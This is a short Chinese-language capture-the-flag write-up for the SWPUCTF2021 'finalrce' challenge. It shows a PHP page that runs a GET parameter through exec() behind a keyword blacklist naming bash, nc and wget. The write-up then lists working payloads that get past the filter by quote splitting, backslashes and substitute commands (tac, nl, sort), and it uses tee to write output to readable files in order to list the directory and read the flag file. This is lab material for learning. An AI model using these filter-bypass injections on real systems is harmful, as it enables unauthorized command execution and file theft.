SWPUCTF2021-finalrce-wp

题目链接

页面源码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
 <?php
highlight_file(__FILE__);
if(isset($_GET['url']))
{
    $url=$_GET['url'];
    if(preg_match('/bash|nc|wget|ping|ls|cat|more|less|phpinfo|base64|echo|php|python|mv|cp|la|\-|\*|\"|\>|\<|\%|\$/i',$url))
    {
        echo "Sorry,you can't use this.";
    }
    else
    {
        echo "Can you see anything?";
        exec($url);
    }
}

执行任意命令都无回显,尝试执行?url=whoami;sleep 3发现确实有延时,说明命令执行成功

绕过

tee命令用于读取标准输入的数据,并将其内容输出成文件,以下几种均可

1
2
3
4
?url=l\s / | tee 1.txt
?url=l''s / | tee 1.txt
?url=l``s / | tee 1.txt
?url=dir / | tee 1.txt

访问1.txt可以看到ls的结果,看到flllllaaaaaaggggggg;由于la被过滤,也要绕过

1
2
3
4
5
6
7
?url=c''at /flllll\aaaaaaggggggg | tee 2.txt
?url=tac /flllll''aaaaaaggggggg | tee 2.txt
?url=nl /flllll????????????? | tee 2.txt
?url=head /flllll''aaaaaaggggggg | tee 2.txt
?url=tail /flllll''aaaaaaggggggg | tee 2.txt
?url=tailf /flllll''aaaaaaggggggg | tee 2.txt
?url=sort /flllll''aaaaaaggggggg | tee 2.txt

访问2.txt即可看到flag

本博客采用 知识共享署名-非商业性使用-相同方式共享 4.0 国际许可协议(CC BY-NC-SA 4.0) 发布.
⬆︎TOP